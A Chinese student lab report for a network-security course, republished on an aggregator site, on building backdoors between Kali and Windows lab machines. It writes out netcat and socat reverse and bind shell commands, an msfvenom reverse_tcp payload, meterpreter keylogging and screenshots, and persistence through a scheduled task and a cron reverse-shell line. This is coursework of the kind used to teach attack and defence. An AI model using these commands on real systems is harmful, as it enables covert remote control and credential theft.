20145233《網絡對抗》第二周 后門原理與實踐

20145233《網絡對抗》第二周 后門原理與實踐

實驗內容

  • windows主機與kali虛擬機實現互聯互通
  • 使用netcat獲取主機操作Shell,cron啟動
  • 使用socat獲取主機操作Shell, 任務計劃啟動
  • 使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell
  • 使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,并嘗試提權

實驗過程

什么是后門

  • 后門程序一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。在軟件的開發階段,程序員常常會在軟件內創建后門程序以便可以修改程序設計中的缺陷。但是,如果這些后門被其他人知道,或是在發布軟件之前沒有刪除后門程序,那么它就成了安全風險,容易被黑客當成漏洞進行攻擊。
  • 后門程序就是留在計算機系統中,供某位特殊使用者通過某種特殊方式控制計算機系統的途徑。
  • 后門程序,跟我們通常所說的"木馬"有聯系也有區別。聯系在于:都是隱藏在用戶系統中向外發送信息,而且本身具有一定權限,以便遠程機器對本機的控制。區別在于:木馬是一個完整的軟件,而后門則體積較小且功能都很單一。后門程序類似于特洛依木馬(簡稱"木馬"),其用途在于潛伏在電腦中,從事搜集信息或便于黑客進入的動作。
  • 后門程序和電腦病毒最大的差別,在于后門程序不一定有自我復制的動作,也就是后門程序不一定會“感染”其它電腦。
  • 后門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。
  • 而且,在病毒命名中,后門一般帶有backdoor字樣,而木馬一般則是Trojan字樣。

使用netcat獲取主機操作Shell,cron啟動

linux獲取windows的shell

887941-20170316112213588-486184350.png

  • 首先兩個操作系統中都要有ncat,(本次實驗中我的靶機有兩個,前半部分的實驗我是在自己的win主機中完成的,但是在后續的實驗中,kali發送的后門程序無法在我的主機中打開,只好利用pki課程的虛擬機來完成后續實驗)kali中已經自帶,window需要下載碼云上的壓縮包到window中,解壓到相應的system中可以直接在命令行中運行。
  • 這里ncat和后面用到的socat我都是在老師共享的碼云附件中下載的。
  • kali下使用ifconfig來獲取卡里主機的ip。
    887941-20170316112245760-1475049778.png

  • 在kali下使用nc -l -p 5233來將5233設置成監聽端口開始監聽,windows下輸入netcat.exe -e cmd 192.168.85.129 5233實現kali對windowsshell的控制并利用ipconfig來驗證。
    887941-20170316112312479-375175365.png

windows獲取linux的shell

  • windows下使用以下命令netcat.exe 192.168.85.129 5233監聽
  • kali下使用nc -e /bin/sh -l -p 5233反彈連接windows

  • 利用ifconfig驗證

ncat傳輸文件

  • windows系統使用ncat.exe -lv 1452 > hhc_file.exe監聽準備接受文件
    887941-20170316113030323-1668679855.png

  • kali系統使用ncat -nv 192.168.85.129 1452 <pwnx來發送指定文件
    887941-20170316113047854-1766611779.png

使用socat獲取主機操作Shell

  • socatncat的增強版,它使用的格式是socat [options] <address> <address>,其中兩個address是必選項,而options 是可選項。
  • socat的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。
  • kali上用socat tcp-listen:5233把cmd綁定到端口5233

  • 同時用socat tcp-l:5233 system:bash,pty,stderr反彈連接
    887941-20170316113115948-1459185723.png

  • windows使用socat readline tcp:192.168.85.129:5233開啟監聽
  • 成功,使用ifconfig檢測
    887941-20170316113138166-1172520012.png

meterpreter生成后門程序

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=208 -f exe >20145233.exe來生成后門程序,然后發送到windows機中。
    887941-20170316112757416-1910347891.png

  • 使用msfconsole命令開啟msf進行設置
    887941-20170316112824401-163817983.png
    887941-20170316112835901-1423151189.png

  • 這時候監聽已經開始了,在windows中運行之前的后門程序可以成功控制遠程shell。
    887941-20170316112814073-41001119.png
    887941-20170316112928713-1034335546.png

meterpreter信息搜集

887941-20170316112442776-423693275.png

  • 首先可以用神奇的help,來看看都有哪些指令,其中指令很多,但是我們本次實驗中用的只是一小部分,其他的功能可以在以后自己來了解。
  • 系統信息截取
    887941-20170316112456370-2103686334.png

  • 對靶機win7進行截圖
    887941-20170316112505338-602743654.png

  • 記錄靶機的鍵盤記錄
    887941-20170316112515682-1472298980.png

  • 安裝為系統服務
    887941-20170316112521854-569602110.png
    887941-20170316112529854-1392335896.png

后門啟動

Windows設置

  • 在Windows系統下,打開控制面板->管理工具->任務計劃程序,創建任務,填寫任務名稱后,新建一個觸發器:
    887941-20170316112544026-124772828.png

  • 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5233 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口5233,同時把cmd.exe的stderr重定向到stdout上:
    887941-20170316112558041-723588416.png

  • 我在這里設定為當系統啟動的時候,啟動后門程序。
    887941-20170316112622166-1423735067.png

887941-20170316112632776-2074090172.png
887941-20170316112640120-666484183.png

使用netcat獲取主機操作Shell,cron啟動

  • kali下終端使用crontab -e修改配置文件,根據格式m h dom mon dow user command來填寫啟動的時間,加入下面一行:
    * * * * * /bin/netcat 192.168.85.129 5233 -e /bin/sh

  • 第一個星號可以設置成0-59的數字,即每小時的第幾分鐘啟動,同理下個星號是1-24小時,下個是1-12···
  • 使用crontab -l查看配置文件

實驗問題回答

  • 如何將一個后門安裝到系統中?
    后門程序被捆綁或者偽裝成正常的程序進入自己的系統。
    不慎點了某些鏈接,被植入了后門程序。
  • 例舉你知道的后門如何啟動起來(win及linux)的方式?
    后門修改權限使得自己在任務控制設定啟動條件,多種多樣,隨意后門程序設置。
  • Meterpreter有哪些給你映像深刻的功能?
    記錄鍵盤輸入記錄配合屏幕攝像頭的截圖來獲取靶機使用者的信息,這就很可怕了。攻擊者拿到信息后想干什么干什么。
  • 如何發現自己有系統有沒有被安裝后門?
    利用殺毒軟件定期清理未知文件。
    開啟防火墻,對于某些默認的端口來查看是什么程序在使用,進行分析。

    實驗總結

  • 本次實驗在完成的時候,我才真的覺得自己學習了好玩并且實用的東西,也理解到了后門攻擊往往存在在很多地方,這些隱患其實是很致命的。
  • 比如,配合屏幕截圖及鍵盤記錄可以很輕易的來獲取被攻擊者的密碼資料等,因為虛擬機的實驗環境沒有攝像頭的驅動程序,所以沒辦法完成人臉捕捉。
  • 這次實驗讓我對于網絡攻防更有興趣了。

轉載于:https://www.cnblogs.com/hanhaochen/p/6558605.html

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/371311.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/371311.shtml
英文地址,請注明出處:http://en.pswp.cn/news/371311.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Spring 3.1:緩存和EhCache

如果在網上查找使用Spring 3.1內置緩存的示例&#xff0c;那么通常會碰到Spring的SimpleCacheManager &#xff0c;Spring的家伙說這對“用于測試或簡單的緩存聲明很有用”。 實際上&#xff0c;我更喜歡將SimpleCacheManager看作是輕量級的&#xff0c;而不是簡單的。 在您希望…

mysql-表完整性約束

閱讀目錄 一 介紹二 not null與default三 unique四 primary key五 auto_increment六 foreign key七 總結一 介紹 回到頂部 約束條件與數據類型的寬度一樣&#xff0c;都是可選參數 作用&#xff1a;用于保證數據的完整性和一致性主要分為&#xff1a; PRIMARY KEY (PK) 標識…

可消費消息數量_17 個方面,綜合對比 主流消息隊列

一、資料文檔二、開發語言三、支持的協議四、消息存儲五、消息事務六、負載均衡七、集群方式八、管理界面九、可用性十、消息重復十一、吞吐量TPS十二、訂閱形式和消息分發十三、順序消息十四、消息確認十五、消息回溯十六、消息重試十七、并發度本文將從&#xff0c;Kafka、Ra…

opencv2.4.13+python2.7學習筆記--使用 knn對手寫數字OCR

閱讀對象&#xff1a;熟悉knn、了解opencv和python。 1.knn理論介紹&#xff1a;算法學習筆記&#xff1a;knn理論介紹 2. opencv中knn函數 路徑&#xff1a;opencv\sources\modules\ml\include\opencv2\ml\ml.hpp 3.案例 3.1數據集介紹 我們的目的是創建一個可以對手寫數字進行…

如何遠程管理Quartz

選項1&#xff1a;JMX 許多人問他們是否可以通過JMX管理Quartz&#xff0c;但我不確定為什么Quartz doc甚至不會提及它。 是的&#xff0c;您可以使用quartz.properties的以下命令啟用石英中的JMX org.quartz.scheduler.jmx.export true之后&#xff0c;您可以使用標準的JMX客…

熱啟動必須聯網嗎_供暖結束,地暖是關閉供水閥門還是關閉回水閥門?你做對了嗎?...

天氣漸漸暖和起來很多城市都停止供暖了一些家庭也停止使用地暖那么今天就來聊一聊&#xff0c;停止供暖后地暖系統應該怎么保養地暖不用時候是關閉供水閥門還是關閉回水閥門&#xff1f;供暖結束 暖氣閥門到底要不要關一般來說&#xff0c;我們供暖期結束是不用關閉總閥門的。因…

python學習(九) 網絡編程學習--簡易網站服務器

python 網絡編程和其他語言都是一樣的&#xff0c;服務器這塊步驟為&#xff1a;1. 創建套接字2. 綁定地址3. 監聽該描述符的所有請求4. 有新的請求到了調用accept處理請求 Python Web服務器網關接口&#xff08;Python Web Server Gateway Interface&#xff0c;簡稱“WSGI”&…

concurrency 方面的books

http://joeduffyblog.com/2016/11/30/15-years-of-concurrency/轉載于:https://www.cnblogs.com/WCFGROUP/p/6566150.html

Spring 3.1緩存和配置

我最近在博客中談論有關Spring 3.1及其新的緩存注釋Cacheable和CacheEvict 。 與所有Spring功能一樣&#xff0c;您需要進行一定數量的設置&#xff0c;并且通常使用Spring的XML配置文件來完成。 在緩存的情況下&#xff0c;打開Cacheable和CacheEvict并不容易&#xff0c;因為…

按條件分類_保稅倉儲企業能否同時存儲非保貨物?“倉儲貨物安裝臺分類監管”如何申請?...

保稅倉儲企業能否同時存儲非保貨物呢&#xff1f;保稅和非保貨物是不是真的不能同在一個“屋檐下”呢&#xff1f;哪些企業可以開展“倉儲貨物按狀態分類監管”業務&#xff1f;企業又該如何申請該項業務&#xff1f;本文就對這些問題進行一下梳理。什么是“倉儲貨物按狀態分類…

ZooKeeper的原理(轉)

一、ZooKeeper的角色 領導者&#xff08;Leader&#xff09;&#xff0c;負責進行投票的發起和決議&#xff0c;更新系統狀態。 學習者&#xff08;Learner&#xff09;&#xff0c;包括跟隨者&#xff08;Follower&#xff09;和觀察者&#xff08;Observer&#xff09;&#…

java課堂筆記

轉載于:https://www.cnblogs.com/16-C-kai/p/6567042.html

Spring– DAO和服務層

歡迎來到Spring教程的第三部分。 在這一部分中&#xff0c;我們將繼續編寫Timesheet應用程序&#xff0c;這次我們將實現DAO層&#xff0c;業務服務并編寫一些測試。 在上一部分中&#xff0c;我們定義了GenericDao接口&#xff0c;該接口告訴我們需要對實體執行哪些操作。 現在…

51nod 1907(多項式乘法啟發式合并)

題目&#xff1a; 分析&#xff1a; 對于一個確定的生成子圖&#xff0c;很明顯是在一個連通塊上走&#xff0c;走完了再跳到另一個連通塊上&#xff0c;假設連通塊個數為cnt&#xff0c;那么答案一定是$min(a_{cnt-1},a_cnt,..,a_{n-1})$ 那現在的問題就是如何求出對于原圖而言…

煮飯的機器人作文_公示|“筆隨我心、心由筆動”作文大賽獲獎名單

卡士大昌杯“筆隨我心、心由筆動”獲獎作品開平的咸湯圓滑輪記&#xff0f;我的宅家成長記折疊式小屋&#xff0f;夕陽&#xff0f;包粽子在過去的卡士大昌杯“筆隨我心、心由筆動”作文活動中我們收到了許多優秀投稿經過專業團隊評選得出獲獎選手作品如下主辦方協辦方一等獎《…

BZOJ 4491: 我也不知道題目名字是什么

4491: 我也不知道題目名字是什么 Time Limit: 10 Sec Memory Limit: 512 MBSubmit: 278 Solved: 154[Submit][Status][Discuss]Description 給定一個序列A[i]&#xff0c;每次詢問l,r&#xff0c;求[l,r]內最長子串&#xff0c;使得該子串為不上升子串或不下降子串 Input 第一…

Spring-boot中讀取config配置文件的兩種方式

了解過spring-Boot這個技術的&#xff0c;應該知道Spring-Boot的核心配置文件application.properties&#xff0c;當然也可以通過注解自定義配置文件的信息。 Spring-Boot讀取配置文件的方式&#xff1a; 一.讀取核心配置文件信息application.properties的內容 核心配置文件是指…

JavaFX 2 GameTutorial第5部分

介紹 這是與JavaFX 2 Game Tutorial相關的六部分系列的第五部分。 我知道自從我寫關于游戲的博客以來已經很長時間了&#xff0c;但希望您仍然與我在一起。 如果您想回顧一下&#xff0c;請閱讀第1部分 &#xff0c; 第2 部分 &#xff0c; 第3 部分和第4 部分 &#xff0c;以了…

h5是可以一鍵打包小程序的_H5手機網站封裝打包微信小程序并實現分享及微信支付...

手機網站打包小程序教程&#xff0c;生成小程序&#xff0c;網頁版小程序 打包微信小程序&#xff0c;H5封裝成微信小程序。微信小程序開發一般分為2種方式&#xff0c;一種就是原生開發小程序&#xff0c;一種是將手機網站打包成小程序。原生開發小程序成本較高&#xff0c;技…

Hive中的數據庫、表、數據與HDFS的對應關系

1、hive數據庫 我們在hive終端&#xff0c;查看數據庫信息&#xff0c;可以看出hive有一個默認的數據庫default&#xff0c;而且我們還知道hive數據庫對應的是hdfs上面的一個目錄&#xff0c;那么默認的數據庫default到底對應哪一個目錄呢&#xff1f;我們可以通過hive配置文件…